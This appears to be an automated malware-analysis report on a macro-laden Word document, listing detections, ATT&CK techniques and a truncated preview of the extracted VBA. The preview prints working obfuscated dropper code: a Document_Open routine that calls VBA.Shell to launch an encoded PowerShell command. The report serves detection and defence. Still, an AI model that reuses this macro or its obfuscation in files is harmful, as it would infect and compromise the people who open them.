MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office Word document containing VBA macros, specifically a Document_Open macro that executes a Shell() command. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Valyria-6874677-0' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6874677-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6874677-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11269 bytes |
SHA-256: 2b9454bd35ea4b7fe0ac70476726f216e2e9dbb3680d0c8e94b1275134d10174 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zmzacfKXZmGN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lEDuh() On Error Resume Next sqWNMw = Tan(54876) Growrd = Tan(56470) oKcnk = ZLObpX JsBujD = CDbl(viJjv) TPqbT = jicIX fajFPh = CDbl(sVAdi * CDbl(IhFXnq + Int(DCoaMN * Rnd(75370)) * oKEwZL * Log(24614 * mHwPL - TKwEpb + Fix(51)))) qiTPz = Tan(65238) IPioUE = Tan(39551) jicOvU = dHOTvG zZDRjN = CDbl(rYYMD) ZzOCRb = PuXdU anbwXY = CDbl(uHhkd * CDbl(tUsjib + Int(LmqBu * Rnd(12477)) * tbQIMR * Log(59924 * vsRcJ - pWvdRl + Fix(51)))) kLhTr = Tan(23554) kPVTX = Tan(6992) cwSOL = NWfXFE EIiSvP = CDbl(zmjjA) VaLvW = SjvfQM FjPTmD = CDbl(wXCCZw * CDbl(cHJEh + Int(tAbhA * Rnd(82936)) * NAkWSZ * Log(73770 * BvOho - MEvQoO + Fix(51)))) jdkODu = Tan(41510) TsfBun = Tan(85788) ztMvmY = OSPhn rKdEb = CDbl(LmqiM) hvfTfj = YvYjP iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51)))) lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758) JQbTQ = Tan(69001) cvAUfY = Tan(28372) qQfppc = vEwwJ UrIWi = CDbl(oszQu) CIPDV = fVYUN MIYNM = CDbl(KSTNT * CDbl(NARvjS + Int(vjrQPq * Rnd(57399)) * WZUwZ * Log(49674 * sBsOH - ZKXDLO + Fix(51)))) bBaaZ = Tan(98775) vsjXzX = Tan(76774) BLpXK = rZbkSX XNjac = CDbl(ipIqD) ThFlS = ABjYTN RNZTfw = CDbl(Usswzi * CDbl(vjsNS + Int(wsqMk * Rnd(11064)) * imDkG * Log(93591 * lObGuc - zIStXj + Fix(51)))) End Function Private Sub Document_open() On Error Resume Next piuUN = Tan(12943) MrbwP = Tan(37903) mMqOX = ziPTJ LEXvkG = CDbl(CzZld) DHSjzl = dQjzWM UcKOm = CDbl(EJXmpz * CDbl(VAmmoV + Int(jiQGqq * Rnd(26887)) * qVmQOQ * Log(86750 * fTHVIz - AXrUB + Fix(51)))) ddLRww = Tan(6420) ZqaMq = Tan(38318) bwLlCf = AwGqZR zwYCY = CDbl(ubhjkf) lQPTWp = Sicaw Yuzdh = CDbl(vVYZX * CDbl(oYoHmh + Int(SjWVN * Rnd(68164)) * iPktf * Log(74819 * YERRV - qpFYl + Fix(51)))) lEDuh zKPECu = Tan(48319) srbff = Tan(61559) mNACs = bnIJVs UiFLpL = CDbl(NKrCsw) QiWfQv = rcLMSa cIbGqA = CDbl(qRWzD * CDbl(mjLddp + Int(XwDPR * Rnd(57947)) * pfZTE * Log(10869 * WBozMt - fVrCw + Fix(51)))) wDunY = Tan(36475) mPitOf = Tan(49838) rwcIA = IVdoJ VdDXKc = CDbl(rbGCXv) PjaHC = fOijjP FcJEz = CDbl(kCdCt * CDbl(WlYPGz + Int(UfbYl * Rnd(88508)) * QsbWz * Log(43858 * SVpoz - YoQtpC + Fix(51)))) End Sub Attribute VB_Name = "ANhITwOwsmRo" Function TPOwucort() On Error Resume Next KsPmQ = cXHrF FAqQIZ = Tan(56605) MkWvK = Tan(84194) lFTtY = GTKsn uVlbvj = CDbl(lJoVD * CDbl(vaATTb + Int(WQZHYm * Rnd(68233)) * PMdkUh * Log(14921 * bJbMsG - zkQud + Fix(51)))) dCIzSV = CDbl(KkiRnp) hCUVGnJ = "HeL" + "L -joIN ( " + "'20P82u115d122" + "~105P99d115~" + "16S13u16E94P85" OiwjKG = lsYksH hPjLU = Tan(63511) JMnUL = Tan(15043) ozGSMZ = Smzidq jpzAVJ = CDbl(TGvRuF * CDbl(kXQWJ + Int(BcDZD * Rnd(24479)) * jpYZNP * Log(31713 * WpTqwC - qLBSU + Fix(51)))) EmXzJd = CDbl(iiVDip) GvkcXAYjoAY = "A71d29S95J" + "82l90f85A83d" + "68J16E66d81~94" + "~84J95f93S11P20" + "P117P95A66u127P" + "101~86u16u1" + "3l16u9" + "4d85P71E2" LrXZn = FnzQj mOios = Tan(20365) ZoOti = Tan(40578) kRWhV = qIpwn pTjmiJ = CDbl(PTtzMQ * CDbl(qEtHJ + Int(UKdRaz * Rnd(79085)) * pdCawN * Log(35724 * tCkkIF - qRJQA + Fix(51)))) pPMiUc = CDbl(qqZPCC) mzwBLSnAiYG = "9l95E" + "82E90J85E" + "83l68u16A99" + "~73f6" jMPKsA = UHGZZ dFjOiw = Tan(86991) iCOUmE = Tan(6194) tdpFPf = OzsuNz bXLOE = CDbl(ZBQvvf * CDbl(XbVmKz + Int(OhBRJ * Rnd(14558)) * qnGWVr * Log(39441 * rJXAHO - NuKkiH + Fix(51)))) tFzMi = CDbl(KZZod) oEiztQ = "7~68u85P93A30S" + "126l85" + "~68J3" + "0S103d85l82A11" + "5f92u89A85" + "E94" TPOwucort = hCUVGnJ + GvkcXAYjoAY + mzwBLSnAiYG + oEiztQ End Function Function AKzQqV() On Error Resume Next DTfKz = iFGDF zatiS = Tan(31199) DKAmGI = Tan(47031) WPSCuf = CUlvEL RqYW ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.